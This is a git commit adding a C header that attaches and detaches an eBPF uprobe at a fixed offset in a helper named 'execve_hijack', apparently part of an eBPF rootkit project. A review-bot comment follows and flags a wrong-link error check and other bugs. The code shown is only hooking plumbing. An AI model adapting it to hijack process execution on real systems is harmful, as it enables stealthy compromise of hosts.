Successfully added uprobes calculation and hooking at arbitrary function of execve_hijack.

h3xduck
2022-03-03 05:53:51 -05:00
parent e64839f080
commit 0c88d5baa9
19 changed files with 1931 additions and 1817 deletions


@@ -0,0 +1,35 @@
#ifndef __MOD_INJECTION_H
#define __MOD_INJECTION_H
#include <linux/bpf.h>
#include <bpf/bpf.h>
#include <bpf/libbpf.h>
#include "kit.skel.h"
#include "common.h"
//Connections
int attach_uprobe_execute_command(struct kit_bpf *skel){
skel->links.uprobe_execute_command = bpf_program__attach_uprobe(skel->progs.uprobe_execute_command, false, -1, "/home/osboxes/TFG/src/helpers/execve_hijack", 4992);
printf("SET\n");
return libbpf_get_error(skel->links.tp_sys_enter_execve);
}
int attach_injection_all(struct kit_bpf *skel){
return attach_uprobe_execute_command(skel);
}
int detach_uprobe_execute_command(struct kit_bpf *skel){
int err = detach_link_generic(skel->links.uprobe_execute_command);
if(err<0){
fprintf(stderr, "Failed to detach fs link\n");
return -1;
}
return 0;
}
int detach_injection_all(struct kit_bpf *skel){
return detach_uprobe_execute_command(skel);
}
#endif
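Review bot: `attach_uprobe_execute_command` checks the wrong link. It stores the result in `skel->links.uprobe_execute_command` but returns `libbpf_get_error(skel->links.tp_sys_enter_execve)`, so a failed uprobe attach is never reported and the caller sees the state of an unrelated link instead. The return should be `return libbpf_get_error(skel->links.uprobe_execute_command);`, and the `printf("SET\n")` belongs after that check, since it currently prints even when the attach failed. The message in `detach_uprobe_execute_command`, `"Failed to detach fs link\n"`, looks copied from another module and should name the uprobe link. The absolute path and the literal offset `4992` are specific to one build on one machine, so they should at least be named constants with a comment saying how the offset was obtained. These functions are also defined in a header without `static`, which gives duplicate-symbol errors if a second translation unit includes it.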